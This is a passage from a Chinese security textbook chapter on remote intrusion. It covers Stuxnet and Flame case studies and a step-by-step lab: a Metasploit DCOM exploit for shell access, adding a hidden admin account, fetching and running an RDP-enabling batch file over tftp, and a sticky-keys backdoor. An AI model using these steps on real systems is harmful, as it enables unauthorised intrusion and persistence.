第6章 遠(yuǎn)程入侵

第6章

遠(yuǎn)程入侵

6.1遠(yuǎn)程入侵的分類6.2一次較為完整的遠(yuǎn)程入侵過程

6.3預(yù)留后門案例一：“震網(wǎng)”病毒奇襲伊朗核電站

2011年2月，伊朗突然宣布暫時卸載首座核電站——布什爾核電站的核燃料，西方國家也悄悄對伊朗核計劃進(jìn)展預(yù)測進(jìn)行了重大修改。以色列戰(zhàn)略事務(wù)部長摩西?亞阿隆在這之前稱，伊朗至少需要3年才能制造出核彈。美國國務(wù)卿希拉里也輕描淡寫地說，伊朗的計劃因為“技術(shù)問題”已被拖延。 但就在幾個月前，美國和以色列還在警告伊朗只需一年就能擁有快速制造核武器的能力，為什么會突然出現(xiàn)如此重大的變化？因為布什爾核電站遭到“震網(wǎng)”病毒攻擊，1/5的離心機(jī)報廢。自2010年8月該核電站啟用后就發(fā)生連串故障，伊朗政府表面聲稱是天熱所致，但真正原因卻是核電站遭病毒攻擊。一種名為“震網(wǎng)”（Stuxnet）的蠕蟲病毒侵入了伊朗工廠企業(yè)，甚至進(jìn)入西門子為核電站設(shè)計的工業(yè)控制軟件，并可奪取對一系列核心生產(chǎn)設(shè)備尤其是核電設(shè)備的關(guān)鍵控制權(quán)。

2010年9月伊朗政府宣布，大約3萬個網(wǎng)絡(luò)終端感染“震網(wǎng)”，病毒攻擊目標(biāo)直指核設(shè)施。分析人士在猜測病毒研發(fā)者具有國家背景的同時，更認(rèn)為這預(yù)示著網(wǎng)絡(luò)戰(zhàn)已發(fā)展到以破壞硬件為目的的新階段。伊朗政府指責(zé)美國和以色列是“震網(wǎng)”的幕后主使。整個攻擊過程如同科幻電影：由于被病毒感染，監(jiān)控錄像被篡改。監(jiān)控人員看到的是正常畫面，而實際上離心機(jī)在失控情況下不斷加速而最終損毀。位于納坦茲的約8000臺離心機(jī)中有1000臺在2009年底和2010年初被換掉。俄羅斯常駐北約代表羅戈津稱：病毒給伊朗布什爾核電站造成嚴(yán)重影響，導(dǎo)致放射性物質(zhì)泄漏，危害不亞于切爾諾貝利核電站事故。 微軟調(diào)查結(jié)果顯示：“震網(wǎng)”正在伊朗等中亞國家肆虐，發(fā)作頻次越來越高，并有逐步向亞洲東部擴(kuò)散的跡象?！罢鹁W(wǎng)”包含空前復(fù)雜的惡意代碼，是一種典型的計算機(jī)病毒，能自我復(fù)制，并將副本通過網(wǎng)絡(luò)傳輸，任何一臺個人電腦只要和染毒電腦相連，自動傳播給其他與之相連的電腦，最后造成大量網(wǎng)絡(luò)流量的連鎖效應(yīng)，導(dǎo)致整個網(wǎng)絡(luò)系統(tǒng)癱瘓?！罢鹁W(wǎng)”主要通過U盤和局域網(wǎng)進(jìn)行傳播，是第一個利用Windows的0day漏洞專門針對工業(yè)控制系統(tǒng)發(fā)動攻擊的惡意軟件，能夠攻擊石油運輸管道、發(fā)電廠、大型通信設(shè)施、機(jī)場等多種工業(yè)和民用基礎(chǔ)設(shè)施，被稱為“網(wǎng)絡(luò)導(dǎo)彈”。案例二：網(wǎng)絡(luò)戰(zhàn)病毒“火焰”現(xiàn)身美國

2012年6月，肆虐中東的計算機(jī)病毒“火焰”現(xiàn)身美國網(wǎng)絡(luò)空間，甚至攻破了微軟公司的安全系統(tǒng)。微軟公司已經(jīng)向用戶提供了緊急的防火補(bǔ)丁。

微軟公司發(fā)布警告稱，“火焰”病毒的制作者已經(jīng)找到使用微軟安全系統(tǒng)來偽造安全證書的方法。這樣，該病毒就能在不被防病毒軟件發(fā)現(xiàn)的情況下任意傳播。微軟公司現(xiàn)已修補(bǔ)了安全漏洞，并將自己被攻破的安全證書列入“不受信任的”證書名單中。

微軟公司表示，由于“火焰”是一種定向精確的高級病毒，包括美國政府和金融機(jī)構(gòu)在內(nèi)的絕大部分微軟用戶都不會被感染。但是，微軟公司不得不采取行動，以防止“不老練”的網(wǎng)絡(luò)攻擊者效仿“火焰”技術(shù)進(jìn)行漫無目標(biāo)的廣泛攻擊。

目前還沒有國家或組織對“火焰”病毒宣稱負(fù)責(zé)，但此間媒體已開始熱議美國與伊朗的網(wǎng)絡(luò)戰(zhàn)爭。一些網(wǎng)絡(luò)安全專家分析病毒代碼后認(rèn)為，“火焰”可能是針對伊朗網(wǎng)絡(luò)戰(zhàn)中的最新一波攻擊，最可能由“某一富裕國家”研發(fā)，而據(jù)信美國和以色列的嫌疑最大。 俄羅斯卡巴斯基實驗室則認(rèn)為，“火焰”病毒結(jié)構(gòu)的復(fù)雜性和攻擊目標(biāo)的選擇性與此前出現(xiàn)的“震網(wǎng)”病毒極其相近，二者應(yīng)“師出同門”。2010年7月，德國專家首先發(fā)現(xiàn)“震網(wǎng)”病毒，伊朗、印度尼西亞、印度等國部分電腦用戶反映受到這種病毒攻擊。該病毒對電腦的傳染性很強(qiáng)，可嚴(yán)重威脅工業(yè)系統(tǒng)的安全。西方媒體當(dāng)時普遍猜測“震網(wǎng)”病毒的目標(biāo)是伊朗的布什爾核電站。思考

1、這兩個案例中攻擊者使用了哪些攻擊技術(shù)？2、0day漏洞會產(chǎn)生什么后果？3、分析“震網(wǎng)”病毒是怎樣傳播的？有何危害？6.1遠(yuǎn)程入侵的分類

遠(yuǎn)程入侵是指攻擊者利用服務(wù)器和操作系統(tǒng)存在的缺陷和安全漏洞，通過遠(yuǎn)程控制、上傳病毒木馬等手段控制服務(wù)器并得到數(shù)據(jù)的訪問權(quán)限。攻擊者在遠(yuǎn)程入侵成功后往往可以在用戶不知情的情況下秘密竊取數(shù)據(jù)，也可以對數(shù)據(jù)進(jìn)行惡意更改等操作

6.1遠(yuǎn)程入侵的分類

根據(jù)入侵對象的不同，可以把遠(yuǎn)程入侵分為以下幾種類型

（1）個人上網(wǎng)電腦入侵通常利用個人電腦的各種系統(tǒng)漏洞和木馬病毒，甚至利用社會工程學(xué)等手段實施入侵。（2）服務(wù)器入侵通常利用服務(wù)器的各種漏洞（0day漏洞、Web漏洞等）實施入侵。（3）無線網(wǎng)絡(luò)入侵一種模式是以破解無線網(wǎng)絡(luò)信號的訪問密碼達(dá)到“蹭網(wǎng)”的目的。RogueAP是另一種入侵模式，其方法是攻擊者在無線網(wǎng)絡(luò)中安放未經(jīng)授權(quán)的AP或者客戶機(jī)，提供對無線網(wǎng)絡(luò)的開放式訪問，無線網(wǎng)絡(luò)用戶在不知情的情況下以為自己通過很好的信號連入了Internet，卻不知自己的各類敏感信息已經(jīng)遭到了攻擊者的監(jiān)聽，攻擊者甚至可以將木馬鏈接輕松插入用戶訪問的各個網(wǎng)址中。（4）工業(yè)控制系統(tǒng)入侵震網(wǎng)病毒是首個發(fā)現(xiàn)的專門針對西門子工業(yè)控制系統(tǒng)的病毒，曾經(jīng)造成伊朗核電站推遲發(fā)電。這種針對工業(yè)控制系統(tǒng)的入侵一般帶有軍事目的，將成為未來戰(zhàn)爭中的一種重要武器。6.1遠(yuǎn)程入侵的分類

根據(jù)入侵策略的不同，可以把遠(yuǎn)程入侵分為以下幾種類型：（1）主動定點式入侵從字面上很容易理解，這種入侵的目標(biāo)非常明確。先確定遠(yuǎn)程入侵的對象，然后采取各種攻擊手段獲取攻擊目標(biāo)的系統(tǒng)控制權(quán)。主動定點式入侵的主要過程如下：身份隱藏->探測并確定攻擊目標(biāo)->遠(yuǎn)程登陸，然后獲得攻擊目標(biāo)的控制權(quán)->遠(yuǎn)程控制->預(yù)留后門->消滅蹤跡。（2）欺騙誘導(dǎo)式入侵不同于主動定點式入侵，這種入侵方式相對被動，一開始并沒有明確的攻擊目標(biāo)，而是通過大量發(fā)送電子郵件或者通過QQ、MSN等聊天工具廣泛發(fā)送信息，誘騙上網(wǎng)用戶打開某個已經(jīng)被掛馬的網(wǎng)站鏈接、附件，或者下載某個已經(jīng)被植入木馬病毒的網(wǎng)絡(luò)熱門文件，一旦有用戶中了木馬，攻擊者就可以隨意控制該用戶的計算機(jī)。6.1遠(yuǎn)程入侵的分類

以上幾種類型并不是孤立的，而是通常交織在一起使用。有時是先通過主動定點式入侵，將某個用戶訪問量大的網(wǎng)站進(jìn)行掛馬，然后利用欺騙誘導(dǎo)式入侵，一旦有用戶訪問了該網(wǎng)站，而該用戶的系統(tǒng)恰好又沒有設(shè)置良好的安全保護(hù)機(jī)制時就很容易被入侵。有時是先通過個人上網(wǎng)電腦的入侵作為跳板，進(jìn)一步針對內(nèi)網(wǎng)服務(wù)器進(jìn)行入侵，甚至是針對工業(yè)控制系統(tǒng)進(jìn)行入侵。例如2010年在伊朗發(fā)生的“震網(wǎng)”病毒事件，先利用包括MS10-046、MS10-061、MS08-067等在內(nèi)的7個最新漏洞進(jìn)行攻擊，這7個漏洞中5個針對Windows系統(tǒng)（其中4個屬于0day漏洞），2個針對西門子公司控制系統(tǒng)，一旦侵入系統(tǒng)，自動化軟件之間的通信將被病毒劫持，進(jìn)而實現(xiàn)對工業(yè)控制系統(tǒng)的入侵

6.2一次較為完整的遠(yuǎn)程入侵過程

以入侵WindowsServer2003服務(wù)器為例，演示一次較為完整的遠(yuǎn)程入侵過程表6-1軟件安裝列表序號軟件名稱功能和作用1Metasploit緩沖區(qū)溢出攻擊2Tftpd32tftp服務(wù)器33389.bat開啟遠(yuǎn)程桌面4Windows自帶遠(yuǎn)程桌面連接連接遠(yuǎn)程計算機(jī)桌面

HostOS（攻擊方）GuestOS（受攻擊方）操作系統(tǒng)WindowsXPSP3Windows2003標(biāo)準(zhǔn)版SP0IP地址安裝軟件Metasploit、tftpd32IIS

表6-2攻防實驗配置3389.batechoWindowsRegistryEditorVersion5.00>>3389.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>>3389.regecho"fDenyTSConnections"=dword:00000000>>3389.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp]>>3389.regecho"PortNumber"=dword:00000d3d>>3389.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>3389.regecho"PortNumber"=dword:00000d3d>>3389.regregedit/s3389.regdel3389.reg

表6-33389.bat文件內(nèi)容6.2一次較為完整的遠(yuǎn)程入侵過程

1、在攻擊方的系統(tǒng)上安裝Metasploit軟件，在Windows程序列表中找到“Metasploit

3”，打開MetasploitConsole，如圖6-1所示

圖6-1MetasploitConsole主界面6.2一次較為完整的遠(yuǎn)程入侵過程

2、設(shè)置攻擊參數(shù)，在命令提示符下依次輸入以下命令：useexploit/windows/dcerpc/ms03_026_dcom//利用漏洞ms03_026實施入侵>setRHOST//設(shè)置遠(yuǎn)程入侵目標(biāo)的ip地址>setPAYLOADwindows/shell/bind_tcp//設(shè)置獲取目標(biāo)主機(jī)shell的方式>exploit//輸入exploit命令進(jìn)行入侵圖6-2成功獲取遠(yuǎn)程主機(jī)的shell6.2一次較為完整的遠(yuǎn)程入侵過程

用ipconfig命令查看這臺主機(jī)的IP，如圖6-3所示圖6-3遠(yuǎn)程主機(jī)的IP地址6.2一次較為完整的遠(yuǎn)程入侵過程

3、在遠(yuǎn)程主機(jī)上建立用戶，并將該用戶添加到管理員組，如圖6-4所示，輸入以下命令：>netuserzjbti$123/add//注意語法格式，123代表密碼，后面有空格。>netlocalgroupadministratorszjbti$/add圖6-4在遠(yuǎn)程主機(jī)上建立管理員用戶6.2一次較為完整的遠(yuǎn)程入侵過程

4、輸入netstat-an命令查看端口情況，該主機(jī)上遠(yuǎn)程桌面默認(rèn)的3389端口沒有打開，如圖6-5所示。為了進(jìn)一步控制遠(yuǎn)程主機(jī)，可以使用批處理文件3389.bat，使其在遠(yuǎn)程主機(jī)上運行并開啟遠(yuǎn)程主機(jī)的遠(yuǎn)程桌面服務(wù)。圖6-5查看端口情況6.2一次較為完整的遠(yuǎn)程入侵過程

為了將3389.bat文件上傳到遠(yuǎn)程主機(jī)上并運行，可以在攻擊方的系統(tǒng)上安裝tftp32軟件作為tftp服務(wù)端，將遠(yuǎn)程主機(jī)作為客戶端，這樣就可以從服務(wù)端來下載該文件，從而間接實現(xiàn)文件的上傳。如圖6-6、6-7所示，做好tftp服務(wù)端的設(shè)置和上傳文件準(zhǔn)備工作。圖6-6Tftp軟件設(shè)置圖6-7Tftp文件下載列表6.2一次較為完整的遠(yuǎn)程入侵過程

如圖6-8所示，輸入如下命令：>tftpget3389.bat//從服務(wù)端下載3389.bat文件

>3389.bat//運行批處理文件并開啟遠(yuǎn)程桌面服務(wù)

圖6-8開啟3389端口6.2一次較為完整的遠(yuǎn)程入侵過程

如圖6-9所示，再次輸入netstat-an命令查看端口情況，3389端口已經(jīng)打開，可以使用遠(yuǎn)程桌面連接軟件來連接遠(yuǎn)程主機(jī)了。圖6-9查看3389端口是否打開6.2一次較為完整的遠(yuǎn)程入侵過程

5、運行windows自帶遠(yuǎn)程桌面連接軟件，如圖6-10、6-11所示，填入相關(guān)信息。圖6-11利用遠(yuǎn)程桌面連接軟件登錄系統(tǒng)圖6-10遠(yuǎn)程桌面連接軟件界面6.2一次較為完整的遠(yuǎn)程入侵過程

如圖6-12所示，已經(jīng)成功通過之前創(chuàng)建的zjbti$管理員賬號登錄遠(yuǎn)程系統(tǒng)，可以對遠(yuǎn)程主機(jī)進(jìn)行各種操作了。圖6-12登錄成功6.2一次較為完整的遠(yuǎn)程入侵過程

在完整的遠(yuǎn)程入侵過程中，攻擊者首先通過對遠(yuǎn)程主機(jī)操作系統(tǒng)存在的漏洞進(jìn)行攻擊而獲得了遠(yuǎn)程主機(jī)的系統(tǒng)shell；其次，在遠(yuǎn)程主機(jī)上建立用戶，并將該用戶添加到管理員組；再次，使用tftp工具將3389.bat文件上傳到遠(yuǎn)程主機(jī)并執(zhí)行該文件打開遠(yuǎn)程主機(jī)的3389端口；最后使用遠(yuǎn)程桌面連接軟件正常連接遠(yuǎn)程主機(jī)，從而實現(xiàn)了對遠(yuǎn)程主機(jī)的完全控制進(jìn)行遠(yuǎn)程入侵的關(guān)鍵是識別遠(yuǎn)程主機(jī)操作系統(tǒng)存在的漏洞并獲取系統(tǒng)shell，一旦獲取了操作系統(tǒng)shell，可以通過打開危險端口、上傳木馬等諸多方法逐步獲取系統(tǒng)的完整控制權(quán)。此外，除了使用windows自帶的遠(yuǎn)程桌面工具連接遠(yuǎn)程主機(jī)外，還可以使用上興遠(yuǎn)控、小熊遠(yuǎn)控、radmin、pcanywhere等木馬或工具實現(xiàn)對目標(biāo)主機(jī)的遠(yuǎn)程控制。6.3預(yù)留后門

后門，英文為backdoor。一臺計算機(jī)上共有65536個端口（從0到65535），如果把計算機(jī)看作是一間屋子，那么這65536個端口就可以被看作是計算機(jī)為了與外界連接所開的65536扇門

每扇門都對應(yīng)一項專門的事務(wù)，有的門是主人特地打開迎接客人的（提供服務(wù)），有的門是主人為了出去訪問客人而開設(shè)的（訪問遠(yuǎn)程服務(wù)）理論上剩下的其他門都該是關(guān)閉著的，但偏偏因為各種原因，有的門在主人不知道的情形下被悄然開啟。于是就有好事者進(jìn)入，主人的隱私被刺探，生活被打擾，甚至屋里的東西也被搞得一片狼藉。這扇悄然被開啟的門就叫“后門”事實上除了通過端口連接外，也可以通過串/并口、無線設(shè)備連接的方式進(jìn)行入侵

6.3預(yù)留后門

攻擊者一旦遠(yuǎn)程入侵成功，一般都會通過預(yù)留后門的方式來保持對遠(yuǎn)程主機(jī)的長期控制

后門產(chǎn)生的必要條件有以下三點：（1）必須以某種方式與其他終端節(jié)點相連。由于后門的利用都是從其他節(jié)點進(jìn)行訪問，因此必須與目標(biāo)主機(jī)使用雙絞線、光纖、串/并口、藍(lán)牙、紅外等設(shè)備在物理信號上有所連接才可以對端口進(jìn)行訪問。只有訪問成功，雙方才可以進(jìn)行信息交流，攻擊方才有機(jī)會進(jìn)行入侵。

（2）目標(biāo)主機(jī)默認(rèn)開放的可供外界訪問的端口至少有1個。因為一臺默認(rèn)無任何端口開放的機(jī)器是無法連接通信的，而如果開放著的端口外界無法訪問，則同樣沒有辦法進(jìn)行入侵。

（3）目標(biāo)主機(jī)存在程序設(shè)計缺陷或人為疏忽，導(dǎo)致攻擊者能以權(quán)限較高的身份執(zhí)行程序。并不是任何一個權(quán)限的帳號都能夠被利用的，只有權(quán)限達(dá)到操作系統(tǒng)一定要求的才允許執(zhí)行對注冊表和log日志等的相關(guān)修改

6.3預(yù)留后門

這里以Windows操作系統(tǒng)的“Shift后門”和Web應(yīng)用的“海陽頂端木馬后門”為例，下面介紹預(yù)留后門的方法

1、Shift后門（1）在Windows系統(tǒng)下，當(dāng)連續(xù)按5下鍵盤上的“shift”鍵時，會彈出如圖6-13所示的“粘滯鍵”對話框

圖6-13彈出“粘滯鍵”對話框6.3預(yù)留后門

該“粘滯鍵”對應(yīng)執(zhí)行的是位于“C:\WINDOWS\system32”下的sethc.exe文件，如圖6-14所示。

圖6-14sethc文件位置6.3預(yù)留后門

（2）將同樣位于該路徑下的cmd.exe文件拷貝出來，并重命名為sethc.exe，然后將該文件復(fù)制到“C:\WINDOWS\system32”下，如圖6-15所示，點擊“是”，這樣原來的sethc.exe文件實際被替換成了cmd.exe，當(dāng)我們再次連續(xù)按5下鍵盤上的“shift”鍵時，彈出了命令行對話框，如圖6-16所示。圖6-15把cmd.exe文件重命名并覆蓋sethc.exe文件6.3預(yù)留后門

（2）將同樣位于該路徑下的cmd.exe文件拷貝出來，并重命名為sethc.exe，然后將該文件復(fù)制到“C:\WINDOWS\system32”下，如圖6-15所示，點擊“是”，這樣原來的sethc.exe文件實際被替換成了cmd.exe，當(dāng)我們再次連續(xù)按5下鍵盤上的“shift”鍵時，彈出了命令行對話框，如圖6-16所示。圖6-15把cmd.exe文件重命名并覆蓋sethc.exe文件6.3預(yù)留后門

圖6-16彈出命令行對話框6.3預(yù)留后門

（3）在遠(yuǎn)程桌面的登錄窗口，當(dāng)我們同樣連續(xù)按5下鍵盤上的“shift”鍵時，同樣彈出了命令行對話框，如圖6-17所示。如此，即使之前創(chuàng)建的登錄用戶被管理員刪除，攻擊者依然可以再次添加管理員用戶，然后登錄系統(tǒng)

。圖